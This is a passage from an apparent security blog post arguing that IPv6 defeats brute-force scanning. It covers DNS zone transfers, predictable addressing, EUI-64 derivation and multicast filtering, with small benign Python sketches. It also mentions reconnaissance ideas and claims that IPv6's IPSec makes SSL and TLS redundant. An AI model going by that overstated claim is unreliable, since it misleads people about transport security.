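print(f"{hosts_per_subnet} addresses -> about {years:,.0f} years at 1M probes/s")
```

Even improving the probe rate by several orders of magnitude still leaves the scan hopeless.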
Worse, the new privacy extended CGA IPv6 addresses are regenerated faster than they can be scanned. We will cover this in coming posts.

IPv6 scanning methods HAVE to change

Public servers will still need to be reachable via DNS, giving attackers some hosts to attack. As such, DNS will become even more of a target than it has ever been. Not only is DNS an attack vector, it is one of the few means of reconnoitring hosts. DNSSEC is critical now.

Zone-transfer and interception attacks will become more and more common as IPv6 starts to be widely deployed. A zone transfer is one of the simplest methods of discovering hosts. It is about time we started to deny DNS zone transfers! Split DNS is more important than ever with IPv6.

The next issue is, as always, human. Administrators may adopt easy-to-remember addresses (::1, ::2, ::53, or simply the IPv4 last octet) to simplify management, as they did with IPv4. This is a bad approach. In IPv6 we need to start using the multicast registration controls and learn to manage systems by their multicast groups.
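The danger is easy to demonstrate: a handful of memorable suffixes is all an attacker needs to try first. A sketch using Python's ipaddress module and the documentation prefix 2001:db8:1:1::/64 as a stand-in for a real network:

```python
import ipaddress

# The suffixes an administrator is tempted to use: low integers and
# service-suggestive values such as ::53 (DNS) or ::80 (web).
memorable = ["1", "2", "53", "80", "443"]
guesses = [ipaddress.IPv6Address(f"2001:db8:1:1::{tail}") for tail in memorable]
print([str(g) for g in guesses])
```

Five probes instead of 2^64: predictable numbering hands back everything the huge address space took away.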

Other as-yet-unthought-of scanning methodologies will come, as an EUI-64 address has a “fixed part” and the Ethernet card vendor's portion of the MAC can be guessed. The 48 bits in a MAC are not random, and the pool of numbers in use is far smaller than the implied 2^48 addresses.
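The guessable structure is easy to show. A sketch of the Modified EUI-64 derivation used by stateless autoconfiguration: splice FF:FE into the middle of the MAC and flip the universal/local bit. Since the first three octets are the vendor's OUI, an attacker who guesses the NIC vendor has already fixed 24 of the 64 bits:

```python
def mac_to_eui64_iid(mac: str) -> str:
    # Build the Modified EUI-64 interface ID from a 48-bit MAC address.
    octets = bytearray(int(x, 16) for x in mac.split(":"))
    octets[0] ^= 0x02                             # flip the universal/local bit
    eui = octets[:3] + b"\xff\xfe" + octets[3:]   # splice in the fixed FF:FE
    # Format as the four 16-bit groups of an IPv6 interface ID.
    return ":".join(f"{(eui[i] << 8) | eui[i + 1]:x}" for i in range(0, 8, 2))
```

For example, a hypothetical MAC of 00:1b:21:0a:0b:0c yields the interface ID 21b:21ff:fe0a:b0c, and only the last 24 bits were ever variable.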

This also means we will see attackers develop new techniques to harvest addresses. Addresses can be harvested from logs and DNS zones, and these will become targets of attacks in their own right.

Further, in compromising routers at key transit points in a network, an attacker can learn new addresses to scan. The difficult part of scanning in IPv6 is finding the host. Once the host is discovered, it can be attacked as normal (with some exceptions based on mobility controls).

The multicast groups also create a target. A new attack vector for discovering routers is created when we look at multicast groups such as the “all nodes / all routers” addresses. IPv6 supports new multicast addresses that can enable an attacker to identify key resources on a network and attack them. For example:
  • all nodes (FF02::1),
  • all routers (FF05::2), and
  • all DHCP servers (FF05::1:3).
If multicast is not secured, an attacker can recon a network and bypass the need to discover hosts the hard way. As a result, it is really important that these addresses are filtered at the border to make them unreachable from the outside. This should be set as a default if no IPv6 multicasting is required externally. The difficulty here is that IPv6 creates diffused networks.
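The border filter itself is simple to express. A sketch using Python's ipaddress module, checking that the well-known groups (note the all-DHCP-servers group is FF05::1:3 per RFC 3315) all fall inside the IPv6 multicast range ff00::/8, so a single drop rule on multicast destinations covers them:

```python
import ipaddress

# Well-known groups an attacker would probe; any packet from outside
# addressed to a multicast destination should be dropped at the border.
sensitive = ["ff02::1", "ff05::2", "ff05::1:3"]

def drop_at_border(dst: str) -> bool:
    return ipaddress.IPv6Address(dst).is_multicast
```

Unicast traffic passes untouched, while every multicast recon probe matches the one rule.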

Firewalls will also change in radical ways.

The death of SSL
Next, there is one area on which I have seen very little (if anything) so far: how IPv6 will destroy the notion of application-based security.

I will address this in more depth tomorrow, but the thing to think about is that IPv6 has mandatory support for IPSec and a cryptographically based host identification and authorisation scheme.
This makes SSL, TLS and other such protocols redundant.

Moreover, application-layer encryption is based on the encryption stack in each application. Each time we re-implement the same crypto requirements over and over, we add more avenues for mistakes. Crypto is hard. If we can do it once in the O/S and not at each layer, we all win.

The conclusion… for today
Basically, IPv6 can make us more secure, but only if we do it right. Web attacks will not go away, and NULL (0-bit) encryption ciphers can still be deployed by unobservant administrators, but there is a way forward if we start planning now.


(Crime / Espionage / Terror) Webinar Series.

The first lecture is up and publicly available:
The Second Cyber (Crime / Espionage / Terror) Webinar is also online and available. It can be accessed at the following URL:
And you can reserve your Webinar seat now for the third lecture this coming Friday at: